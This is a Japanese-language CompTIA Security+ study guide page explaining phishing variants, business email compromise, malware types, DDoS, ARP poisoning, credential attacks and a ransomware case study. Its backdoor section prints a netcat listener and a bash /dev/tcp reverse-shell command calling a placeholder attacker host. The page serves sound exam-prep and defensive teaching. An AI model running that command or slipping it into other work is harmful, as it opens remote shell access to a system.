CompTIA SY0-701: 脅威、攻撃、脆弱性 — 学習ガイド
こちらの一部です: CompTIA Security+ SY0-701 — 学習ガイド. 検証済みの解答で練習: CompTIA試験ハブ, または時間制限付き模擬試験に挑戦: ExamRoll.io.
現代の脅威情勢は、技術的なエクスプロイトと人的な操作を組み合わせ、深刻度の低い脆弱性を連鎖させて影響の大きい侵害へと発展させ、正規のビジネスプロセスの中に自らの活動を紛れ込ませる攻撃者によって定義されます。脅威を理解することは、意図、能力、そしてベクトルを理解することから始まり、表面的な兆候を全体像の説明として受け入れないことが重要です。
ソーシャルエンジニアリングとフィッシングの亜種
ソーシャルエンジニアリングは、ソフトウェアの欠陥ではなく、信頼、緊急性、権威、または好奇心を利用します。従来のフィッシングは、偽の配送通知やパスワードリセット要求などの一般的なおとりを何千もの受信者に送信し、広範囲に網をかけます。スピアフィッシングは、その範囲を狭め、LinkedInや企業のウェブサイト、侵害情報ダンプからの偵察を利用して、特定の個人や部署に合わせてカスタマイズされたメッセージを作成します。ホエーリングは経営幹部を標的にします。外部の顧問弁護士から送られてきたかのように見せかけたメッセージを受け取るCFOが典型的なターゲットです。彼らの権限が、より影響の大きい詐欺を可能にするためです。
チャネルの亜種は、同じ操作を他のメディアにも拡張します。ビッシング(ボイスフィッシング)は電話を利用し、多くの場合、発信者IDを偽装し、ITヘルプデスクになりすましてMFAコードを抜き出すなどの口実を使います。スミッシングはSMSを利用し、短縮URLやモバイル特有のおとり(「お荷物をお届けできませんでした — こちらで再スケジュールしてください」)を頻繁に利用します。モバイルブラウザはURLを切り捨て、証明書の詳細を隠すため、スミッシングは不釣り合いなほど高い成功率を誇ります。
**ビジネスメール詐欺(BEC)**は、通常マルウェアを一切伴わないため、特に注意が必要です。正規のメールボックスを侵害したか、あるいはそっくりなドメイン(accounts@vendor-corp.comの代わりにaccounts@vend0r-corp.com)をスプーフィングした攻撃者が、実際の請求書のやり取りに割り込み、電信送金をリダイレクトさせます。メールの内容が文脈的に正しく、添付ファイルも存在しないため、ゲートウェイのアンチマルウェアやURLサンドボックスはほとんど保護を提供しません。FBIのIC3は、BECによる損失が1年間で29億ドルを超えたと報告しており、これは他のサイバー犯罪カテゴリーを大きく引き離して最も被害額の大きいものです。
よくある罠は、無害に見える兆候を過剰に解釈してしまうことです。ユーザーがフィッシングサイトに認証情報を送信し、「ページが見つかりません」というエラーを受け取ったとしても、インシデントは解決していません。それは、攻撃者が情報を窃取した後に被害者をリダイレクトさせた、完了済みの認証情報収集です。明らかなエラーページがないことは、攻撃の特徴であり、失敗の証拠ではありません。
マルウェアの種類
マルウェアは一枚岩ではありません。ランサムウェアはデータを暗号化して支払いを要求し、Ryuk、Conti、LockBitなどの現代的な亜種は、二重恐喝の材料とするために、まずデータを外部に流出させます。明白な兆候は、ファイル拡張子の一括変更です。ファイル名が.ryk、.locked、またはランダムな文字列に変更され、各ディレクトリにREADME.txtやHOW_TO_DECRYPT.htmlといった名前の身代金要求メモが置かれます。
ルートキットははるかに深いレベルで動作し、カーネル構造、システムコールテーブル、またはファームウェア(ブートキット、UEFIインプラント)をフックして、プロセス、ファイル、ネットワーク接続をオペレーティングシステム自体から隠します。標準的なツールはルートキットが制御しているカーネルに問い合わせるため、tasklistやpsの出力を信頼することはできません。検出には通常、オフラインでのフォレンジックイメージングや、chkrootkitのようなツールやVolatilityによるメモリ分析を用いた既知の正常なベースラインとの比較が必要です。
バックドアは、持続的な不正アクセスを提供し、多くの場合、初期侵害の後にインストールされます。コマンド&コントロールサーバーにビーコンを送信するスケジュールタスク、アプリケーションに挿入されたハードコードされた認証情報、またはあまり使われないポートで待機するリスニングサービスの形をとることがあります。NetcatやMeterpreterのようなツールを使用したリバースシェルが典型的です。
# Attacker listener
nc -lvnp 4444
# Victim callback (dropped by malware)
bash -i >& /dev/tcp/attacker.example/4444 0>&1
ここでの罠は、トリアージにおける視野狭窄です。「マルウェアを検出」というラベルのアラートがすぐに隔離されたとしても、インシデントが終息したわけではありません。初期のドロッパーが、エンドポイントエージェントには見えないバックドアを確立したり、ルートキットをインストールしたりしている可能性があります。
ネットワーク攻撃
**分散型サービス妨害(DDoS)**攻撃は、可用性を狙います。ボリューメトリック攻撃(UDPフラッド、ICMPフラッド)は、生の帯域幅を消費します。リフレクション/アンプ攻撃は、リクエストよりも大きなペイロードで応答するサードパーティのサービスを悪用します。送信元アドレスを偽装した60バイトのDNSクエリが、3,000バイトの応答を返すことがあります。また、NTPのmonlistやmemcachedのアンプ攻撃では、50,000倍を超える増幅率を達成できます。公開ウェブサービスがサーバー上では「稼働中」でありながらインターネットから到達不能になり、ネットワークログにトラフィックの急増が見られる場合、その原因はアプリケーションのバグではなく、ほぼ常にアップストリームのリンクやステートテーブルを飽和させるDDoS攻撃です。
オンパス攻撃(旧称「中間者攻撃」)は、通信する2つの当事者の間に攻撃者を配置します。ローカルネットワークでは、ARPポイズニングが通常のメカニズムです。攻撃者はゲートウェイのIPを所有していると主張する未承諾のARP応答を送信し、被害者のトラフィックを攻撃者のホスト経由で静かにルーティングさせます。ettercapやarpspoofのようなツールがこれを自動化し、その後、攻撃者はsslstripでTLSを剥がしたり、コンテンツを注入したりできます。
タイポスクワッティングは、正規のドメイン(goggle.com、paypa1.com)を模倣したドメインを登録し、タイプミスされたURLを捕捉したり、フィッシングやBECのための説得力のあるインフラとして機能させたりします。
認証情報攻撃
認証情報攻撃は、コードの脆弱性を悪用するのではなく、脆弱な認証を悪用します。ブルートフォース攻撃は、1つのアカウントに対して考えられるすべてのパスワードを試行するため、ノイズが大きく、ロックアウトポリシーをトリガーします。パスワードスプレー攻撃はそのモデルを逆にし、Winter2024!やPassword123のような非常に一般的なパスワードを1つか2つ、数千のアカウントに対して試行し、どのアカウントでもロックアウトのしきい値を下回るようにします。これは、クラウドアイデンティティプロバイダーでMFAを導入していない組織に対して非常に効果的です。
クレデンシャルスタッフィングは、過去の侵害で収集されたユーザー名とパスワードのペアを再利用し、サービス間でのパスワードの使い回しを悪用します。認証情報は少なくとも1つのサービスで有効であるため、基本的な認証コントロールをバイパスします。2022年のOktaの侵害は、サポート委託先のアカウントに対するクレデンシャルスタッフィングから始まりました。これは、すべての特権アクセスパスでMFAが強制されていない場合、アイデンティティプロバイダーでさえも安全ではないことを示しています。
パスザハッシュ攻撃およびパスザチケット攻撃は、パスワードをクラッキングするのではなく、メモリから認証情報を盗み出します。Windowsシステムでは、LSASSメモリに保存されているNTLMハッシュをMimikatzで抽出し、平文のパスワードを知らなくても他のシステムへの認証に再利用できます。同様に、Kerberosのチケット発行チケット(TGT)も盗まれて再利用される可能性があります。緩和策には、Credential Guard(仮想化ベースのセキュリティエンクレーブでLSASSを分離する)、Protected Usersセキュリティグループへの所属、そしてKerberosが利用可能な場合にNTLMを無効にすることなどが含まれます。
実践的なシナリオ:パスワードスプレー攻撃によるランサムウェア
従業員2,400人のある物流会社は、Microsoft 365テナントでMFAを強制していませんでした。攻撃者は3日間にわたってパスワードスプレー攻撃を実施し、LinkedInから収集した既知のすべてのメールアドレスに対してパスワードSummer2023!を試しました。41個のアカウントが一致しました。攻撃者は侵害したアカウントの1つ(あるリージョナルマネージャーのもの)を使用して、M365の認証情報を受け入れる会社のVPNにアクセスしました。VPNから、攻撃者は2週間かけて内部偵察を行い、バックアップサーバーとドメインコントローラーを特定しました。ある金曜の夜、340台のサーバーにわたってLockBitランサムウェアが起動されました。復旧には19日を要し、身代金、フォレンジック、逸失利益を含めて約410万ドルの費用がかかりました。この一連の攻撃全体は、たった1つの欠けていた対策、つまりM365テナントでのMFAによって可能になりました。パスワードスプレー攻撃は検出可能です。単一のIPから多数のアカウントにわたる認証失敗を相関分析するSIEMルールがあれば、初日にフラグが立てられていたでしょう。
← ID・アクセス管理 · すべてのドメイン · ネットワークセキュリティとアーキテクチャ →
これらの問題を練習する → · ExamRoll.ioで時間制限付き練習 →
Pass the whole exam — not just this question
You found this answer. Get every verified question and explanation in one place, and save hours of prep. Free to start.
試験に合格する →